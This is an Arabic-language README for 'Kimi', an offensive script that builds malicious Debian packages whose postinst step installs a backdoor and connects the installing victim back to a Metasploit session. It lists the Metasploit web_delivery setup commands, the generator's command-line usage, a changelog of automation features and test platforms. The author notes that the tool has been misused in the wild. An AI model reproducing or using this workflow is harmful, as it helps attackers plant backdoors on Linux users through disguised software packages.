
نص برمجي لإنشاء حزم debain ضارة (تروجانات debain).
نص برمجي لتوليد حزم دبيان خبيثة (أحصنة طروادة لدبيان).
كيمي هو اسم مستوحى من "Kimimaro" إحدى شخصياتي المفضلة من أنمي يسمى "Naruto".
كيمي هو نص برمجي يولد حزمة دبيان خبيثة لميتاسبلويت (metasploit)
والتي تتكون من ملف bash. يتم نشر ملف bash في الدليل "/usr/local/bin/".
يتم تنفيذ الباب الخلفي بمجرد أن يحاول الضحية تثبيت حزمة deb بسبب ملف postinst
ملف bash يقوم بالحقن ويعمل أيضًا كأمر نظامي معين، الذي عندما ينفذه الضحية
ويضرب المهاجم بجلسة.
نقاط القوة :
-- مستقل تمامًا. يعني لا يحتاج المستخدم لتثبيت أي منشئ حزمة دبيان
-- يمكن دمجه بسهولة مع أي مولد حمولة بسبب مشاركات الوسائط (سخيف :P أعرف)
كيمي يعتمد أساسًا على وحدة web_delivery وكل شيء مؤتمت.
كل ما يحتاجه المهاجم هو القيام بالإعدادات التالية :
إعداد Web_Delivery في msf :
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit
توليد الحمولة الخبيثة :
dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0 -a i386
ملاحظة :: تم صنع هذا المشروع لدمجه مع Venom Shellcode Generator 1.0.13.
يمكن استخدامه بشكل مستقل أيضًا، كل ما يحتاجه المستخدم هو تغيير مسار URL في متغيرات msf
-------------------------------------------------------------------------------------
تم الاختبار على :
لينكس مينت 17.2 سينامون (أوبونتو 14.04)
باروت أو إس (ديبيان جيسي)
كالي رولينج 2.0
[22-فبراير-2017]
-- تمت إضافة دالة إنشاء ملف "postinst" لجعل تنفيذ الملف الخبيث المضمن تلقائيًا
-- تمت إضافة دالة إنشاء ملف RC لأتمتة كاملة مع فتح المعالج، يعني لا حاجة لـ
إعداد المعالج يدويًا
-- تم إصلاح بعض الأخطاء الشائعة [شكر خاص لـ r00t 3xp10it :)]
[12-أكتوبر-2017]
-- تمت إضافة وسيط سطر الأوامر (-a/--arch) لاختيار البنية (i386/amd64)
[24-أبريل-2019] - إصدار اختبار.
-- يمكن الآن تعيين URI و LPORT مخصصين
-- تم تحديث حمولة البايثون وفقًا لبايثون 2/3 وآخر إصدار من Metasploit 5 أيضًا.
-- تم إعادة تنفيذ الكود بالكامل على الرغم من أنه لا يزال يدعم بايثون 2.7

منشور المدونة : http://hackinguyz.blogspot.in/2017/03/kimi-malicious-debian-package-creator.html
فيديو يوتيوب : https://youtu.be/Dsn6BRHy9_w
عينة VirusTotal (لأنني رأيت استخدامًا سيئًا لهذا النص في البرية): 7d91abb413c8cd3274f348ff12f244b9a503abfe018f138d34bbe2deab04472f
نشاط الشل المشبوه [الفريق الأحمر]
تويتر : @bofheaded